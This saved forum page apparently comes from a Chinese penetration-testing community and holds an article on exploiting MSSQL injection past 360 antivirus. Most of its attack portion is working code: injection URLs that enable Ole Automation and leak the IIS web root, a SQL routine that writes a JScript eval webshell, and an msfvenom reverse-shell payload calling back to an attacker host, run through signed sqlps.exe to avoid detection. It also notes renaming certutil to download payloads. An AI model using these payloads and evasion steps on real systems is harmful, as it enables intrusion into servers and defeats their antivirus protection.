translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50">
|
|||
|
|
<nav class="navbar navbar-inverse navbar-fixed-top">
|
|||
|
|
<div class="container nav">
|
|||
|
|
<div class="visible-xs header-response sf-hidden">
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="row hidden-xs">
|
|||
|
|
<div class="col-sm-8 col-md-8 col-lg-8">
|
|||
|
|
<div class=navbar-header>
|
|||
|
|
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</button>
|
|||
|
|
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="collapse navbar-collapse" id=global-navbar>
|
|||
|
|
<ul class="nav navbar-nav">
|
|||
|
|
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/questions>问答</a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/shop>商城</a></li>
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/movable>活动</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
|
|||
|
|
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
|
|||
|
|
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
|
|||
|
|
<input type=text name=word id=searchBox class=form-control placeholder value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</nav>
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main" style=width:100%>
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">MSSQL注入绕过360执行命令</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>0x01 废话
|
|||
|
|
=======
|
|||
|
|
|
|||
|
|
有时候mssql注入会碰到-os-shell执行不了命令的情况,有可能是因为权限不够不能开启xp\_cmdshell,还有可能就是杀软拦截了
|
|||
|
|
|
|||
|
|
常见的只有360会拦截,如果被拦截了就是下面这样的
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
0x02 拦截原因
|
|||
|
|
=========
|
|||
|
|
|
|||
|
|
这里用上x64dbg在CreateProcessA和CreateProcessW打上断点
|
|||
|
|
|
|||
|
|
MSSQL调用的CreateProcessW
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
可以看到xp\_cmdshell是直接使用cmd /c来执行命令的
|
|||
|
|
|
|||
|
|
这拦截的原因和之前的php很相似
|
|||
|
|
|
|||
|
|
不过这里没有php那么高的操作空间
|
|||
|
|
|
|||
|
|
0x03 写webshell到网站根目录
|
|||
|
|
====================
|
|||
|
|
|
|||
|
|
一般来说都是IIS+MSSQL的搭配,MSSQL可以用sp\_oacreate来执行一些读写功能,因为不调用cmd所以360不会拦截,前提是需要知道网站的根目录
|
|||
|
|
|
|||
|
|
如果权限够高可以直接将IIS配置文件404页面
|
|||
|
|
|
|||
|
|
首先要开启sp\_oacareate这个存储过程
|
|||
|
|
|
|||
|
|
```sql
|
|||
|
|
exec sp_configure 'show advanced options', 1;RECONFIGURE
|
|||
|
|
exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后用sp\_oacreate创建scripting.filesystemobject对象调用copyfile这个方法来实现复制文件
|
|||
|
|
|
|||
|
|
```sql
|
|||
|
|
declare @o int
|
|||
|
|
exec sp_oacreate 'scripting.filesystemobject', @o out
|
|||
|
|
exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\inetsrv\config\applicationHost.config' ,'C:\inetpub\custerr\zh-CN\404.htm';
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这里的配置文件是IIS7的,路径是固定的,404的路径也是固定的,只要权限够高就可以复制过来
|
|||
|
|
|
|||
|
|
当然如果是国外语言路径可能会变化
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
http://192.168.159.128/index.aspx?user_id=1;
|
|||
|
|
exec sp_configure 'show advanced options', 1;RECONFIGURE;
|
|||
|
|
exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
|
|||
|
|
declare @o int;
|
|||
|
|
exec sp_oacreate 'scripting.filesystemobject', @o out;
|
|||
|
|
exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\inetsrv\config\applicationHost.config' ,'C:\inetpub\custerr\zh-CN\404.htm';
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后访问一个不存在的页面就可以找到网站根目录
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
权限低的话可以用xp\_dirtree来找就是有点慢
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
http://192.168.159.128/index.aspx?user_id=1;
|
|||
|
|
CREATE TABLE tmp (dir varchar(8000),num int,num1 int);
|
|||
|
|
insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1;
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
先创建一个tmp表然后将xp\_dirtree的结果输出到tmp中
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在网页中需要使用注入查表得到结果,如果直接查询可能会报错需要转换一下
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
http://192.168.159.128/index.aspx?user_id=-1 union select null,null,(select top 1 convert(varchar(100),dir COLLATE Chinese_PRC_CI_AS) from FoundStone_Bank.dbo.tmp),null,null
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
MSSQL和MYSQL不同没有LIMIT需要用where来过滤不想要的结果
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
http://192.168.159.128/index.aspx?user_id=-1 union select null,null,(select top 1 convert(varchar(100),dir COLLATE Chinese_PRC_CI_AS) from FoundStone_Bank.dbo.tmp WHERE DIR not in (SELECT TOP 1 dir FROM FoundStone_Bank.dbo.tmp)),null,null
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
类似这样,前面的top 1不用改,where中的top 从0开始增长就可以,sqlmap也是同种方式
|
|||
|
|
|
|||
|
|
虽然xp\_dirtree的方法繁琐但是还是可以有效的找到绝对路径,要么网站和数据库不在同个地方这就办法了
|
|||
|
|
|
|||
|
|
```sql
|
|||
|
|
select host_name(); //主机名
|
|||
|
|
select @@servername; //服务器名
|
|||
|
|
//如果相同则代表数据库和web在同一台机器上面
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
得到根目录后用Scripting.FileSystemObject中CreateTextFile和WriteLine来实现写入webshell
|
|||
|
|
|
|||
|
|
注意有拦截的话上面肯定有360webshell要免杀
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
http://192.168.159.128/index.aspx?user_id=1;
|
|||
|
|
declare @f int,@g int
|
|||
|
|
exec sp_oacreate 'Scripting.FileSystemObject',@f output
|
|||
|
|
EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'c:\inetpub\wwwroot\shell.aspx',1
|
|||
|
|
EXEC sp_oamethod @f,'WriteLine',null,'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a+b));%>'
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
拿到shell了基本是IIS的用户,这里本来可以直接通过juicypotato提权
|
|||
|
|
|
|||
|
|
但是360不知道从什么时候开始加上了CrteateProcesWithToken的hook就提权不了了
|
|||
|
|
|
|||
|
|
整理了一下想着mssql本来就是高权限的,只要想办法用mssql来执行木马就可以了
|
|||
|
|
|
|||
|
|
0x03 权限提升
|
|||
|
|
=========
|
|||
|
|
|
|||
|
|
说明一下只有mssql2005是直接高权限,这次的测试环境搭建的时候使用管理员启动的mssql,所以mssql实际的权限取决于网站管理员
|
|||
|
|
|
|||
|
|
在护网中也有碰到过用administrator起mssql的网站管理员,所以下面的方法就是提供一种思路
|
|||
|
|
|
|||
|
|
在网上搜索了一下发现用wscript.shell可以不调用cmd执行程序
|
|||
|
|
|
|||
|
|
```sql
|
|||
|
|
declare @o int;
|
|||
|
|
exec sp_oacreate 'wscript.shell',@o out;
|
|||
|
|
exec sp_oamethod @o,'run',null,'calc';
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
可以看到在sqlserver的进程中启动了计算器
|
|||
|
|
|
|||
|
|
但是上传上去的木马,运行了就会提示某某程序在入侵sqlserver不让运行
|
|||
|
|
|
|||
|
|
经过多次测试后发现
|
|||
|
|
|
|||
|
|
1. 在系统目录中无害的程序是不杀的,像calc,ipconfig,tasklist这些,哪怕复制到别的路径来也不拦截
|
|||
|
|
2. 有数字签名的
|
|||
|
|
|
|||
|
|
像cmd,powershell啥的在系统目录中但是也被杀的死死的
|
|||
|
|
|
|||
|
|
还有一个关键点,有数字签名的程序创建的进程要是不可信还是会被拦截,只要检测到父进程是sqlserver就会杀的特别四
|
|||
|
|
|
|||
|
|
那么需要找一个有数字签名的,可以直接加载到内存中的程序就可以上线了
|
|||
|
|
|
|||
|
|
在mssql的目录中看到了sqlps.exe有点眼熟,找了一下发现最近有篇文章就是关于sqlps的
|
|||
|
|
|
|||
|
|
[https://mp.weixin.qq.com/s?\_\_biz=MzU1NDkwMzAyMg%3D%3D&amp;mid=2247491483&amp;idx=1&amp;sn=5c43d9377fb5729104665e00040c2f36&amp;scene=21&amp;ref=www.ctfiot.com#wechat\_redirect](https://mp.weixin.qq.com/s?__biz=MzU1NDkwMzAyMg%3D%3D&mid=2247491483&idx=1&sn=5c43d9377fb5729104665e00040c2f36&scene=21&ref=www.ctfiot.com#wechat_redirect)
|
|||
|
|
|
|||
|
|
可以说是一个功能不全的powershell吧,但是可以直接执行ps1脚本,这样就不会创建进程导致被杀软拦截
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.130.4.204 LPORT=60001 -f psh-reflection > shell.ps1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这里要用msf生成的脚本,cs生成会出现问题执行不了
|
|||
|
|
|
|||
|
|
将生成的脚本上传到服务器,上传的的方法有很多,可以用远程下载,也可以像webshell一样写入
|
|||
|
|
|
|||
|
|
远程下载只需要将Certutil.exe重命名,然后放到别的目录就可以了
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
http://192.168.159.128/index.aspx?user_id=1;
|
|||
|
|
declare @o int;
|
|||
|
|
exec sp_oacreate 'wscript.shell',@o out;
|
|||
|
|
exec sp_oamethod @o,'run',null,'sqlps -ExecutionPolicy bypass -File c:\windows\temp\shell.ps1';
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这样就上线了,但是到这里还是不能执行命令的,因为本质还是sqlserver下的进程
|
|||
|
|
|
|||
|
|
需要用migrate注入到别的进程内就可以执行命令了
|
|||
|
|
|
|||
|
|
0x04 总结
|
|||
|
|
=======
|
|||
|
|
|
|||
|
|
sqlps直接执行是会被360拦截的,但是由sqlserver创建后执行就不拦截了
|
|||
|
|
|
|||
|
|
mssql是可以直接修改注册表启动项的,当然sqlps修改注册表也是不会被拦截的,这可能就是有签名的强大吧
|
|||
|
|
|
|||
|
|
因为2008操作空间有点小,如果有.net4.0可以用dotnet,csi这些直接将恶意代码加载进内存
|
|||
|
|
|
|||
|
|
总的来说需要一个有数字签名的程序可以直接加载进内存,如果有数字签名的程序可以直接执行dll,要么存在dll劫持的漏洞,也可以达到上线的目的的</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h1 blockindex=0>0x01 废话</h1>
|
|||
|
|
<p blockindex=1>有时候mssql注入会碰到-os-shell执行不了命令的情况,有可能是因为权限不够不能开启xp_cmdshell,还有可能就是杀软拦截了</p>
|
|||
|
|
<p blockindex=2>常见的只有360会拦截,如果被拦截了就是下面这样的</p>
|
|||
|
|
<p blockindex=3><img src=data:image/png;base64,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
|
|||
|
|
<h1 blockindex=4>0x02 拦截原因</h1>
|
|||
|
|
<p blockindex=5>这里用上x64dbg在CreateProcessA和CreateProcessW打上断点</p>
|
|||
|
|
<p blockindex=6>MSSQL调用的CreateProcessW</p>
|
|||
|
|
<p blockindex=7><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB4AAAAQFCAYAAABQN9UwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzde3Rb533m+2fzIom6U3dLsiVZgGRakhPLTmJAaZM4k3FAqw3tuGzSNHJmVgpm9cyMSGd05nKqM80oa5oZtQW9Ms2UGE9bq3PaDnsxnchE2sZ2Y0dEfFEch5YoCfBFlmTLulJ33nH+2LhsABvABgiQFP39rAUvEdh7490v3r0l88HvfQ1JsVgsJgAAAAAAAAAAAADAza1qshsAAAAAAAAAAAAAACgPAmAAAAAAAAAAAAAAmCYIgAEAAAAAAAAAAABgmiAABgAAAAAAAAAAAIBpoqaYjTveOK/dL5/R2YFRR9sbimnrkjp975dv0cdXzCmpgQAAAAAAAAAAAAAAZwxJsVgsVnDDk1eG5Pr/jmlwrPg32Vw/U71fdhe/IwAAAAAAAAAAAADAMccVwG9eHkwLf2sNqX5mlQybbUdi0oWBUcUM89VDFwfG204AAAAAAAAAAAAAQAGO1wC2FgkvmmHolUfW6+TXGnTC5nHq0Y36fe8KVcncKWYbE0++UIshw9uu6LiPFFW715DREipDqwDAmVDL1LnvlO9+CgAAAAAAAAAAxiNvADx6+aRG3v2xho//k+ae+Yk+OfaKPjn2ir46t1d3XP+pdOLHyYdx8gVVXX5HtVWGZtZUq9m1QHNrHefLJQm1GDKMFmXFH9F2eQ1D3vbMKMIa1EZ1tLeizZsaQi0yDCP1uGkDmpBarOdh+/kq63zLtU2hkC3a7k3f3jBkGF5lH9rheZTCcZvj14HdtVP0W+Y7TvoXI5J9VGAMmsc0NEVyzbzGdw+aTj4k91MAAAAAAAAAwLSWnfVkPyr1vuN5PVPOhHbo5x26/oRLA52f1uBff0Z3PNeo0MC/VGjgX+rbJ7+s4b++X4N//ZnkY6Dz07r+Jw0a7PnP8YZIVRXqhARfk19Sr45mZCzR/Z0KSwp37k8PmqL71RmW/E0+SS619sQU62mVq6KtnDzRdq+MRqk7FlMs8djdpx3lChwnUKilUb2BSOo8uv0Kt7nTA7ZQi4zGXgUi8W0iAankbYLy